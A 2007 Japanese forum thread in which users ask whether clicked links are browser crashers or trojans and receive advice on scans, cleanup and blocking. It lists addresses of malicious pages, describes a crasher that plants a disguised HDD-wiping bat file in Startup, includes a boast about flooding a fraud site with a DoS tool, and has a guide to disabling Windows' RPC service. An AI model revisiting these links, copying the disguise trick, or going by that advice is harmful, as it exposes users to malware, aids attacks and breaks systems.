名無しさん@お腹いっぱい。 :2007/11/06(火) 00:29:42
age
よくもまあ、これだけポンポンクリックする奴が居たもんだな ネット詐欺で儲ける奴が出るわけだ
881 :
名無しさん@お腹いっぱい。 :2007/11/08(木) 02:18:52
とある衝撃?画像スレで貼られており、勢いにのって大した確認もせずに踏んでしまいました。 そのスレでは後々トロイの木馬だと書き込まれています。 tp://sorimati.s3.x-beat.com/upload/source/up0140.jpg 小さいウィンドウが大量に出現し、慌ててPCをシャットダウンしましたが、 これは情報流出系のブラクラなのでしょうか? PC知識乏しくて申し訳ありませんが、お教え下さい。お願い致します。
mailtoストームたくさん、telnetストームもたくさん iflameで大量の有害サイトを読み込んでるみたいです 鑑定スレの過去ログではトロイとかも検出されてるようです そのトロイがどんな被害を出すかまではわからないけど一度オンラインスキャンした方が良いと思われ
884 :
881 :2007/11/09(金) 18:46:04
>>882-883 ご返答ありがとうございました。
御忠告に従い、下記URLでスキャンをしてみました。
tp://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php#
結果、複数のスパイウェアが発見され、駆除いたしました。
アドウェアというもののみ駆除出来ませんでしたが、調べてみてそれほど害は無いと判断しています。
本当にありがとうございました。以後気をつけます。
885 :
名無しさん@お腹いっぱい。 :2007/11/10(土) 23:24:21
886 :
名無しさん@お腹いっぱい。 :2007/11/10(土) 23:52:52
ウィルスっぽいですが鑑定してください><
ttp://www8.uploader.jp/dl/vipprog/vipprog_uljp00181.zip.html 【使用OS】
windows vista
【WindowsUpdateしてるか】
yes
【AntiVirusは何を使っているか】
no
【ちゃんとUpdateしてるか】
no
【スキャンした結果(ウイルス名・発見場所)】
いまやってる最中です><
【別のオンラインスキャンしたならその結果は】
ないです><
【症状を具体的に、分かる限りすべて書く】
もしウィルスだったらどうするの
という窓が出て画面がジョジョに黒くなり白くなり真っ白になる
ボロークンファイルなんちゃらエラーなんちゃらという英語がでてきた
再起動してなおったっぽいのでごみ箱に捨ててオンラインスキャン最中です
【何をしたらそんなことになったのか】
DL→回答→起動→\(^o^)/
【これまでにとった措置】
オンラインスキャン最中
【その他の質問】
これからどうすればいいか
ウィルスなのか、またどういうウィルスなのか
この二つを馬鹿な私に御教授してください
AhnLab-V3 2007.11.10.0 2007.11.09 - AntiVir 7.6.0.34 2007.11.09 - Authentium 4.93.8 2007.11.10 - Avast 4.7.1074.0 2007.11.09 - AVG 7.5.0.503 2007.11.10 - BitDefender 7.2 2007.11.10 - CAT-QuickHeal 9.00 2007.11.10 - ClamAV 0.91.2 2007.11.10 - DrWeb 4.44.0.09170 2007.11.10 - eSafe 7.0.15.0 2007.11.08 - eTrust-Vet 31.2.5284 2007.11.09 - Ewido 4.0 2007.11.10 - FileAdvisor 1 2007.11.10 - Fortinet 3.11.0.0 2007.10.19 - F-Prot 4.4.2.54 2007.11.09 - F-Secure 6.70.13030.0 2007.11.09 - Ikarus T3.1.1.12 2007.11.10 - Kaspersky 7.0.0.125 2007.11.10 - McAfee 5160 2007.11.09 - Microsoft 1.3007 2007.11.10 - NOD32v2 2651 2007.11.10 - Norman 5.80.02 2007.11.09 - Panda 9.0.0.4 2007.11.10 Suspicious file Prevx1 V2 2007.11.10 - Rising 20.17.52.00 2007.11.10 - Sophos 4.23.0 2007.11.10 - Sunbelt 2.2.907.0 2007.11.09 - Symantec 10 2007.11.10 - TheHacker 6.2.9.122 2007.11.09 - VBA32 3.12.2.4 2007.11.08 - VirusBuster 4.3.26:9 2007.11.10 - Webwasher-Gateway 6.0.1 2007.11.10 -
これ以上はわかりません。 誰かお願いします。
890 :
名無しさん@お腹いっぱい。 :2007/11/11(日) 01:28:31
>>887 >>888 >>889 ありがとうございます
オンラインスキャンをした結果セキュリティホール3つが検出されただけでした
念のためアンチウィルスソフトいれてみます
素早い回答ありがとうございます><
891 :
名無しさん@お腹いっぱい。 :2007/11/11(日) 02:17:45
転職板にこんなのがありました。 拡張子が怪しそうなのですが、鑑定願います。 tp://ad.affipa.ne.jp/LK00002639/PS00037055/click.cgi
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
>>891 ここは鑑定スレじゃねえ!!
どっか行け糞が
ちなみにそれはなんでもない転職なんちゃらいうサイトだ
894 :
名無しさん@お腹いっぱい。 :2007/11/12(月) 14:11:06
ブラクラ焦るよな 経験あり
>>892 これってほんと?
この番号のポートをルーターで閉じるだけじゃ駄目なの?
ルーターで遮断しているならまず問題ないような気はするが、リモートからの攻撃が届かない というだけだからな もしMS03-026のような脆弱性がRPCに発見された場合、ローカルで脆弱性を利用するプログラムを 実行されたら対処する術が無いのもまた事実だ そういう意味では必要無いサービスは停止というのは有効だと思う
>>896 遅レスすみません。ありがとうございました。
確認したら、すでにルーターで塞いでましたが、とりあえずやっときます。
898 :
名無しさん@お腹いっぱい。 :2007/11/20(火) 20:34:20
operaで、 JAVAとプラグインとJAVAスクリプトとクッキーとリファラーを無効にしてても 発動するようなブラクラ紹介しろよカス。 こちとらブラクラ踏んでも毎回何も起こらないんで退屈なんだよ! .
そういうスレではないので
900 :
名無しさん@お腹いっぱい。 :2007/11/20(火) 22:36:37
902 :
名無しさん@お腹いっぱい。 :2007/11/21(水) 21:31:39
>>898 かたっぱしから踏んできたがたいしたことなかったぞ。マジで。
.
903 :
名無しさん@お腹いっぱい。 :2007/11/21(水) 21:32:15
俺はリファラーだけ有効だな 頻度が多すぎるし、JAVAスクリプトみたいに入り切りのボタン無いし リファラーとブラクラって関係あるの?
905 :
898 :2007/11/22(木) 19:47:03
あ、ほんとだ、普通にボタンあった
907 :
名無しさん@お腹いっぱい。 :2007/11/25(日) 10:44:31
ttp://www.moviesglam.com/ を踏んでしまって、バスターが警告出してきました。
数日前の状態へ復元して、Temporary Internet Filesの中も全て削除しました。
あとはスキャンしてみて、何も出てこなければ大丈夫でしょうか?
ここは鑑定スレじゃねえ糞野郎
911 :
名無しさん@お腹いっぱい。 :2007/11/25(日) 17:28:33
>>909 ※このアドレスはワンクリック詐欺サイトのひとつです。
912 :
名無しさん@お腹いっぱい。 :2007/11/26(月) 00:24:32
>>911 俺、低脳糞業者のワンクリ大好きw
田代砲で10000回くらい踏んでくるわwww
916 :
名無しさん@お腹いっぱい。 :2007/11/28(水) 01:56:29
鑑定依頼ばっかw
ちょっと前までけっこう勢いのあるスレだったのにね 貼られたURLかたっぱしからNGにしてただけだけど
919 :
sage :2007/11/29(木) 23:31:32
もし怪しいときに 「ブラウザの一時キャッシュ」 をしなかったらどういった被害があるのでしょうか?
920 :
名無しさん@お腹いっぱい。 :2007/11/30(金) 01:46:26
ソースチェッカーオンラインで自分たちで少しは調べたらどうだ
そんな習慣が無い人が聞いてくるのさ 詐欺にもポンポン引っかかるだろうな
922 :
名無しさん@お腹いっぱい。 :2007/12/01(土) 21:57:43
上のほうにもあったのですが
ttp://imepita.zz.tc/020070817 を踏んでしまいました。
踏んだらピコピコ音がずっとしててページは開かず
右下の緑が1コマのままだったので画面を×で閉じて終了しました。
この時点でもうこのサイトを踏んだことになってしまうのでしょうか(ページが開ききっていない)
有名なウイルスサイトだとわかって調べてみたのですが、
これは新しいウィンドウを開いたり、メールの新規作成を開いたりするだけなのでしょうか?
今はそのようなことはおきてません。
他には何か症状はありますか?自分のデータが外に出るウイルスがあるようですが
そのようなことはないのでしょうか?
ウィルス対策ソフトをまだいれてなかったので、駆除などができていません。
マイコンピューターでHTML_SUAR.Aを検索して削除すればよろしいのでしょうか?
>>922 ウイルスじゃない、気にするな
IEの一時ファイルの削除でOK
924 :
名無しさん@お腹いっぱい。 :2007/12/02(日) 02:01:18
>>922 危険URLだね。オンラインスキャンしたほうがいいと思う。
詳しくはソースチェッカーオンラインで検索してURL調べてくれ
>>923-924 どっちなんでしょうか?
>>924 さん危険とは具体的にどうなんでしょうか
とりあえずノートンでも明日買ってこようかなと思ってますが
926 :
424 :2007/12/02(日) 07:03:51
>>425 悪い寝ぼけてたわ。そこのサイト自体は問題ないと思う。
ただ、そこから危険なサイトに行けるだけだわ
927 :
名無しさん@お腹いっぱい。 :2007/12/02(日) 07:06:38
925だった。気になるならヤフーでソースチェッカーオンラインで検索して調べてみればいいよ
質問です。もともとPCにノートンがはいっているのですが、スキャンをしてスパイスウェアなどは検出されませんでした。 とでればウイルスの心配はありませんか??
929 :
名無しさん@お腹いっぱい。 :2007/12/02(日) 13:36:12
まだ不安にならカスペルスキーオンラインスキャナとウィルスバスターのオンラインスキャンもしてみたらどう?
930 :
名無しさん@お腹いっぱい。 :2007/12/02(日) 15:04:58
昨日yourhost?というアダルト動画の投稿サイトで、オナニー しようとしてurl踏んだら、別のウィンドウが、 でてきて、HadodoraiBugadoていうのを保存 したら、103に対する重大なエラーが生じた。 とか表示されました。NTT西日本のウイルス検索 ツールで、ウイルス検索したら検索してる間は1 9万近く検索済みって表示されたのに、検索が 全て終ったら、ウイルスは見つかりませんでし た。って表示されました。これはどうしたらいいんですか?なんか携帯 でぐぐったらHadodoraiBugadoは最悪とかあったんで心配です
931 :
名無しさん@お腹いっぱい。 :2007/12/02(日) 15:14:34
tp://www2.strangeworld.org/uedakana/ 踏んで、焦りました。これってやばいでしょうか? アドバイス、お願いいたします。
>>930 アンチウイルスが何も見つからなかった、と言ってる以上
それで納得するしか無いんじゃなかろうか
それでも不安ならまた別のウイルススキャン試していくしかない
無償オンラインスキャン|ウィルスチェック Part.2
http://pc11.2ch.net/test/read.cgi/sec/1177784260/ Yourfilehostはたまに広告経由で悪意のあるページを呼び出す事があるから
PCに対策を施してないなら近づかない事を勧める
>>931 有名なブラクラ
一部アンチウイルスが反応するが特に感染活動は行わない
脱出できたなら問題無い
このスレでも散々既出なんで検索おね
933 :
930 :2007/12/02(日) 17:50:21
有難うございます。でもなぜ検索中は19万も ヒットしたのに、終わると0になったのは心配 なのでオンラインの検索しようと思うのですが 、ウイルスにかかってる状態でもネットに繋げても大丈夫でしょうか? こちらの情報が流出したり、他のネットユーザーに ウイルスを広げたりしても困るので‥
検索済みというのは、そのファイルを検査しましたって事で ウイルスに感染している事を示すものでは無い 結果表示の時点で感染無しと診断されたのなら 当面それを信じる他無い
935 :
名無しさん@お腹いっぱい。 :2007/12/02(日) 18:47:38
わかりました。有難うごございます
mantoruhakaseを踏んでしまいましたorz ウイルスバスターでyou[1].js検出して 削除したんですがもう大丈夫なんでしょうか? それとも・・・
937 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 21:05:01
ageわすれ
938 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 21:18:25
tp://mantoruhakase-blog.bravehost.com/ マントル…頼む!
939 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 21:30:58
過去スレで解決しました お騒がせスイマセン
940 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 23:27:50
941 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 23:28:36
>>940 すみません、誤って直リンしてしまいました…;
まあ、精神的ブラクラかも知れないなw PCには何の損害も無い 何故ならただの画像ファイルだからだ
943 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 23:35:08
>>942 ありがとう御座いました。
画像ファイルはウィルスでは無いのですか?
とりあえず一安心です。本当にありがとう御座います。
こ、これはひどい
945 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 23:41:27
946 :
942 :2007/12/07(金) 23:49:19
>>943 太めのおばさんの裸の写真が出てきただろ?
それだけだよ
精神的にショッキングな画像かもしれないということで「精神的ブラクラ」とw
947 :
名無しさん@お腹いっぱい。 :2007/12/07(金) 23:51:11
>>946 ああなんだ、良かった…
ありがとう御座います。ホッとしましたw
マントルふんじゃってAVGでトロイ見つけて 削除したけどそれだけで大丈夫かな? えらい人教えてください。
949 :
名無しさん@お腹いっぱい。 :2007/12/08(土) 00:02:41
>>948 削除したならひとまずは大丈夫だと思いますが、念を押すとOSのインストール
をし直した方が良いかも知れません。
トロイは再生するものもあると聞きましたので…
950 :
名無しさん@お腹いっぱい。 :2007/12/08(土) 00:07:47
>>948 VIPで流行ってるやつだよな?あれなんなの?
あ、
>>858 にもあるなw
わりと前からある代物らしい
blogっぽいURLだからついクリックしても安全だと思い込むのが味噌か
下手に知識があると逆に引っかかる感じ
>>954 とりあえず画像ではない。htmlファイル
中身はだいぶ手が込んでる
flvビデオを再生しようとすると各種ブラクラ+グロ画像ページへ飛ばされる
ざっと見ではウイルス感染活動は無いと思うけど
脱出できたのなら、一応念のためウイルススキャンした方がいいかもしれん
精神的ブラクラである事を前置きして、一応こっちでも聞いた方がいいかも
【ウィルス情報質問 総合スレッド★Part44】
http://pc11.2ch.net/test/read.cgi/sec/1192120765/ 本当にamilalaが作ったものなら心配なので、帰ったらもう少し調べてみる
956 :
954 :2007/12/09(日) 20:14:45
>>955 鑑定ありがとうございます。
ノートンでスキャンしてみましたが、今のところ問題はなさそうです。
誘導してくださったスレでも聞いてみます。
もしまた何か分かりましたらレスくださると助かります。
957 :
954 :2007/12/09(日) 21:44:03
958 :
名無しさん@お腹いっぱい。 :2007/12/09(日) 22:51:53
tp://www.fuckin-star.com/
アダルトサンプル動画サイト
(サイトの性質上、トップページのアドレスだけ書きます)
奥に進んでzipで動画を置いてるページに行くと
大量の掲示板書き込み試行の後が、ブラウザ履歴に残ります
>>957 のブラクラチェッカーではほぼ安全判定
javaスクリプト切ると問題無し?よくわかりません
Mac OSX 10.3.9、Safari
>>960 の兄貴へ
自分のオツムでは無理です
名前ではじいちゃってもよかですか?
>>958 送信まではしてない模様
>>961 NG指定でもいいけど、また別のjpg偽装されたらいたちごっこかもしれんね
HOSTファイルいじってsnipr.comかcunt.multiservers.com(ブラクラ置き場所)
を無効にするか、それかjava切るか、IEやめるかとか
964 :
961 :2007/12/10(月) 18:46:53
うん、始めサーバ込みではじこうかと思ったけどやっぱそうしてた そこドメインも利用者もわけありっぽいよね
serversだけじゃなくてsiteもあるね cunt.multiserversは見つからない
966 :
954 :2007/12/10(月) 19:49:52
>>962 詳しい鑑定ありがとうございます。
自分は3番(Outlook起動、メール作成ウインドウが次々開いていく)の時点で
強制的にPCの電源を切りました(電源ボタンの長押し)。
今のところHDDのデータなども異常はないみたいです。
これでもう大丈夫でしょうか?
>>966 破滅への道筋は
1.アラートにだまされてbatファイルを保存
2.保存を選んでも保存ダイアログがまた出るので、我慢できずリセット再起動
(グロと効果音がうるさくて正常な思考を妨げられています)
3.スタートアップに保存されている事に気付かず、OS起動と同時にHDD消去開始
なので、batファイル(極窓ではhtmファイル扱い)をダウンロードさえしていなければ
特に問題無いはず。データも大丈夫だろう
一応
>>962 の1.までなら普通にページ閉じて脱出
2.以降はタスクマネージャから終了で抜けられる
気になるのは2日くらい前の鑑定結果と内容に違いが出ている事
ブラクラhtmの更新日時が最近なので=今も内容を更新中らしい
またあの手この手で拡散するかも知れない
968 :
954 :2007/12/10(月) 22:46:56
>>967 レスありがとうございます。
batファイルのダウンロードは行っていないと思います。
今のところ特に問題は無いようなので、しばらくPCの様子を見てみます。
鑑定結果が少し気にはなりますが、これ以上拡散されないことを願います。
969 :
954 :2007/12/10(月) 22:55:41
>>967 すみません、もう一つだけ質問させてください。
もし自分の気付かないうちにbatファイルをダウンロードしてしまっていた場合、
自分のPCの中からそれを探し当てることや、削除することは可能でしょうか?
>>960 jane.tmpが飛び先の記述で汚染されているのに気づいたw
>>969 batファイルが実行される前なら可能
OSがXPで、保存先を特に変更していないなら
保存先:C:\Documents and Settings\ユーザー名(もしかしたらAll Users)\スタート メニュー\プログラム
ファイル名:MS_Patch.txt .bat
になる
後はフォルダから取り出すなりファイル名でドライブ検索すればいい、が
こうして無事に書き込みしている事そのものが、ファイルのダウンロード及び
実行もしていない事の証左なので、心配する事も無い
batファイルは恐らく実行時に自身を消去するよう書かれてる
それ以前に実行されたらOSが無事では済まないと思うが
また、件のブラクラページはもう撤去されて、新たに作られたページ
(踏んでないけど100%悪意のあるページだろう)に飛ぶ
こういうのって2chブラウザをオミトロン越しにするしかないのかな
973 :
954 :2007/12/11(火) 22:03:37
>>971 丁寧なレスありがとうございます。
一応ドライブ検索してみましたが、該当するファイルはありませんでした。
ブラクラの進化は早いんですね。今後も気をつけます。
鑑定していただいて本当に安心しました。ありがとうございました。
974 :
958 :2007/12/12(水) 00:10:49
>>962 >>963 回答ありがとうございます!!
今のところ、迷惑メールも来ることなく
PCも正常に動作してます。
今後とも気をつけますです。。。
>>974 その気持ちを、いつまでも忘れないでください。
976 :
名無しさん@お腹いっぱい。 :2007/12/13(木) 21:56:37
//1st.geocities.jp/mimigeruhakaseblog/ おねがいします
978 :
名無しさん@お腹いっぱい。 :2007/12/14(金) 11:10:40
すいません、私もこれを踏んでしまったのですが mantoruhakase-blog.bravehost.com/ 良く分からないブログの名前が出て、 Trojan.ByteVerify を読み込んでしまい、ビープ音とともに タグが消える挙動をしました。 すぐに電源を落として、ネットに繋がずスキャンしたら、 上記のウィルスが発見されて削除されましたが これで安全でしょうか?
>>978 Trojan.ByteVerifyは、2003年のMSJavaVMのセキュリティホールなので、今は検出はされても実行はされない。
/ヽ /ヽ ':' ゙''" `':, ミ ・ω・ ;, :; . っ ,つ `:; ,;' `( /'"`∪
>>980 詳しく見てないが
>>954 ,958,960のURL違い
>>962 以降を参照しておくれ
踏んだ瞬間に発動してそれっきりのものなので
脱出できたのなら特にやる事は無いはず
書いてある事とあまりにも違う現象・症状だったら
内容を変更したのかも知れないので、言って下さい
それとカスペルスキーが検出対応してるんで 入れてる人はサイト転送の段階で防げるかもしれません 宣伝というわけでも無いんですが カスペはここら辺の検体提出・対応は割と融通の利く所らしく もしこういう類の罠や引っ掛けがこの先心配なら、導入を検討されてみては
根本的にIEの動作を何とかしないと解決にならないね 一応、設定を一箇所変えれば画像に見せかけたタイプはやり過ごせるけど、まともに 動かなくなるサイトもあるかもしれない まあ、MSが糞ってことでw だって、Mozilla.orgやOpera Softwareのブラウザはこんなものには引っかからないんだものw これではMSが糞としか言いようが無い
985 :
980 :2007/12/16(日) 08:54:27
>>982 ありがとうございます。980です。
踏んだ後、962にあるのがすべて表示されました。
違う点があるんですが、その中でも気になるのは、
コマンド プロンプトが表示されました。
わずかな間だったので、何か入力されたのか変更されたのかは、
確認できませんでした。
あと、Yahoo!メッセンジャーを起動させられました。
IDやパスを入力していなかったので、ログインさせられる事はありませんでした。
対処方法としてした事は、一つずつ閉じていって、一番最初に開いた分と
バッチファイルをダウンロードするのを拒否して閉じると、
また最初から同じ事をやりはじめるので、そのままOSを終了させました。
しばらくしてから起動後、スパムとウィルスチェックソフトを動かしました。
危険なものは、何も引っ掛かりませんでした。
今回のはこれで何とかなりましたが、
F4キーで閉じれるものは閉じてそれでも開き続ける場合、
強制終了した方がいいと思います。最終手段ですが。
無限スクリプトのようにメールの作成とか、開き続けられると
PCがいってしまう事があります。
それで昔、購入3日ほどのダイナブックを壊されてしまいました。
販売店に泣きついたら、一つ上の上位機種にしてもらえましたが、
精神的なダメージやストレスはそうとうのものがありました。
参考までに長文スマソ。
コマンドプロンプトは多分telnetかな 最近のPCなら特に意味を成さないだろう サイトの目的はHDD抹消を含めた嫌がらせなので 最終的にはとにかくbatファイルを落としたまま 再起動をしない事ができていればいい また飛び先変えてるのな いい加減きりが無い
987 :
名無しさん@お腹いっぱい。 :2007/12/18(火) 21:51:08
すいません。ニュース板でこれを踏んでしまいました。 tp://1st.geocities.jp/mimigeruhakaseblog/ VBの警告メッセージが複数出て、削除方法を見る前に慌てて閉じてしまいました。 その後でVBのウィルス検索をしてみましたが、ウィルスは検索されず、いくつか スパイウェアが引っかかりました。(削除済み) IEの一時ファイルは削除済みです。 他に何かすべきことはあるでしょうか? すいません、助言お願いします。
990 :
987 :2007/12/19(水) 01:29:16
>>989 ありがとうございます。
今後は注意します。
991 :
名無しさん@お腹いっぱい。 :2007/12/19(水) 02:21:07
992 :
名無しさん@お腹いっぱい。 :2007/12/19(水) 06:00:49
>>991 踏んだけど何もなかった。
>>992 12000×6927の画像
メモリ少ないとハングするかも
>>993 ありがとうございました。今後は気を付けます
995 :
名無しさん@お腹いっぱい。 :
2007/12/19(水) 14:24:34 tp://topicscollector.blog55.fc2.com/?mode=m&no=2697 一見普通のゲーム動画に見えたのですが、クリックしたところ無限ポップアップに遭いました。 危険性の無いものでしょうか?